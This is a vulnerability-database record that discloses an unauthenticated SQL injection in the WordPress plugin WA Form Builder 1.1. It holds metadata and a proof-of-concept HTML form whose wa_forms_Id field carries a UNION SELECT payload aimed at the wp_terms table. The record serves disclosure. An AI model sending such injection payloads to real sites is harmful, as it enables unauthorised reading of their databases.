Description
$_POST[ ‘wa_forms_Id’ ] is not escaped. WAFormBuilder_ui_output() is accessible to any user.
{"id": "WPEX-ID:4A720545-54FD-4636-A6C7-A504531BF786", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WA Form Builder 1.1 - Unauthenticated SQL Injection", "description": "$_POST[ \u2018wa_forms_Id\u2019 ] is not escaped. WAFormBuilder_ui_output() is accessible to any user.\n", "published": "2016-12-05T00:00:00", "modified": "2019-11-01T09:45:27", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Lenon Leite", "references": ["http://lenonleite.com.br/en/blog/2016/11/29/wa-form-builder-1-1-sql-injection/"], "cvelist": [], "lastseen": "2021-02-15T22:05:58", "viewCount": 2, "enchantments": {"dependencies": {}, "score": {"value": 2.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 2.0}, "sourceData": "<form method=\"post\" action=\"http://www.example.com/?p=1\">\r\n <input type=\"text\" name=\"wa_forms_Id\" value=\"0 UNION SELECT 1,2,3.4,5,6,7,8,9,10,11,12,13,name,15,16,17,slug FROM wp_terms WHERE term_id=1\"/>\r\n <input type=\"text\" name=\"action\" value=\"insert_data\"/>\r\n <input type=\"submit\">\r\n</form>", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645798118, "score": 1659842276, "epss": 1679062491}, "_internal": {"score_hash": "f6dee1ed0dcf6413efd7c08028baf227"}}
{}
WA Form Builder 1.1 - Unauthenticated SQL Injection